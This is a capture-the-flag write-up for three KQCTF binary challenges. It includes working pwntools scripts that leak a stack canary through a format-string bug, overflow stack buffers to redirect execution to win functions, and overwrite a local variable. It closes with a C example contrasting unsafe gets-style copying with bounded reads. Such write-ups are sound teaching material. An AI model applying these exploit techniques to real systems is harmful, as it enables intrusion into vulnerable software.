This program has a win() function that prints the flag. So if we redirect the program flow to win(), we get the flag.
Before the exploit, check the mitigations the binary has:
```
root@e60a28c09eb6:~/kqctf/pwn/birb# checksec tweetybirb
[*] '/root/kqctf/pwn/birb/tweetybirb'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
To control the flow, we need to know the canary value, because it sits in front of the SFP (saved frame pointer). Luckily, we can use the FSB (format string bug) in the first input. Use gdb to calculate the offset from the stack to the canary.
```
root@e60a28c09eb6:~/kqctf/pwn/birb# ./tweetybirb
What are these errors the compiler is giving me about gets and printf? Whatever, I have this little tweety birb protectinig me so it's not like you hacker can do anything. Anyways, what do you think of magpies?
AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p
AAAAAAAA.0x7f2297185a83.0x7f22971878d0.0x7f2297185a00.0x7f22971878c0.0x7f229718c500.0x4141414141414141.0x252e70252e70252e.0x2e70252e70252e70
hmmm interesting. What about water fowl?
asdf
```
The first input leaks the canary; the second input redirects execution to win() by stack buffer overflow. Pay attention to stack alignment: to resolve that I need a ret gadget before calling win().
```python
#!/usr/bin/python3
from pwn import *

p = remote("143.198.184.186", 5002)
#p = process("./tweetybirb")
e = ELF("./tweetybirb")
#context.log_level = 'debug'

# First input: format string leak, the canary is the 15th stack argument
p.sendlineafter(b"magpies?", b"%15$p")
p.recvline()
canary = int(p.recvline().decode('utf-8').strip("\n"), 16)

# Second input: fill the buffer up to the canary, put the leaked canary back,
# then overwrite saved RBP and the return address
padding = b"A" * 72
payload = padding
payload += p64(canary)          # keep the canary intact
payload += b"DEADBEEF"          # saved RBP, any 8 bytes
payload += p64(0x00401364)      # ret gadget for stack alignment
payload += p64(e.sym['win'])
sleep(0.5)
p.sendlineafter(b"fowl?", payload)
p.interactive()
```
This is a very simple BOF challenge. The program has a flag() function that prints the flag.
Below is the checksec result for the program.
```
root@e60a28c09eb6:~/kqctf/pwn/zoom# checksec zoom2win
[*] '/root/kqctf/pwn/zoom/zoom2win'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
The program doesn't have a canary, so just calculate the distance from the buffer to the return address. Also use the ret gadget, for the same reason (stack alignment).
```python
#!/usr/bin/python3
from pwn import *

p = remote("143.198.184.186", 5003)
e = ELF("./zoom2win")

# No canary: pad from the buffer straight to the saved return address
padding = b"A" * 0x28
payload = padding
payload += p64(0x004012b4)      # ret gadget for stack alignment
payload += p64(e.sym['flag'])
p.sendlineafter(b"\n", payload)
p.interactive()
```
The program waits for input, prints the input back, and checks the 'magic' value.
```
root@e60a28c09eb6:~/kqctf/pwn/magic# ./akindofmagic
Is this a kind of magic? What is your magic?:
Test Value
You entered Test Value
Your magic is: 0
You need to challenge the doors of time
```
If we enter a very long string, the magic value changes.
```
root@e60a28c09eb6:~/kqctf/pwn/magic# ./akindofmagic
Is this a kind of magic? What is your magic?:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
You entered AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Your magic is: 1094795585
You need to challenge the doors of time
Segmentation fault
```
The program has no canary and prints the flag if the magic value is int 1337. In the program, the magic variable is located right after the input buffer. This means we can control the magic value by stack overflow.
```python
#!/usr/bin/python3
from pwn import *

p = remote("143.198.184.186", 5000)

# 44 bytes fill the input buffer; the next bytes land on the magic variable
padding = b"A" * 44
magic = 1337
payload = padding
payload += p64(magic)           # overwrite magic with 1337
p.sendlineafter(b"magic?:", payload)
p.interactive()
```
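The three challenges share one root cause: an unbounded read (gets) into a fixed stack buffer, with a local variable, the canary and the return address lying just past it, and in tweetybirb a printf called with user input as its format string. The C below is an added example, not the challenge source, modelling the akindofmagic layout as a struct (the 40-byte buffer size and the field names are this example's assumptions, not the real binary's) so that the unbounded copy can be contrasted deterministically with the bounded, fgets-style read that keeps magic untouched and reports truncation. The echo function shows the format-string fix: user text only ever travels as a "%s" argument, so "%p" or "%15$p" in the input is printed as characters, which is also what gcc's -Wformat-security warning (the "errors about gets and printf" the challenge banner mentions) is pointing at.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Model of the stack layout the write-up describes: a fixed input buffer
 * directly followed by the magic value the program compares against.
 * Size and names are assumptions of this example, not the binary's layout. */
struct frame {
    char buf[40];
    int  magic;
};

/* Unbounded copy, modelling gets(): every input byte is written, so bytes
 * past buf land in magic. Deliberately unsafe, kept only for contrast;
 * len must not exceed sizeof(struct frame) here. */
void read_unbounded(struct frame *f, const char *input, size_t len) {
    memcpy((char *)f, input, len);   /* length is chosen by the caller's input */
}

/* Bounded read, the fgets()-style fix: never writes past buf, always
 * NUL-terminates, and returns true when input had to be cut so the caller
 * can reject oversized input instead of silently accepting it. */
bool read_bounded(struct frame *f, const char *input, size_t len) {
    size_t max = sizeof f->buf - 1;
    bool truncated = len > max;
    size_t n = truncated ? max : len;
    memcpy(f->buf, input, n);
    f->buf[n] = '\0';
    return truncated;
}

/* Echo the input back through a literal format string: any '%' directives
 * in the user's text are printed, not interpreted as conversions. */
void echo(const struct frame *f) {
    printf("You entered %s\n", f->buf);
}

int main(void) {
    struct frame f = { .magic = 0 };
    char line[128];
    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    line[strcspn(line, "\n")] = '\0';          /* drop the trailing newline */
    bool cut = read_bounded(&f, line, strlen(line));
    echo(&f);
    printf("Your magic is: %d%s\n", f.magic, cut ? " (input truncated)" : "");
    return 0;
}
```

Run it and paste the 100-character line from the write-up: the bounded version echoes the first 39 characters, reports truncation, and magic stays 0, where the original binary printed 1094795585 (0x41414141, four 'A's) and crashed on return.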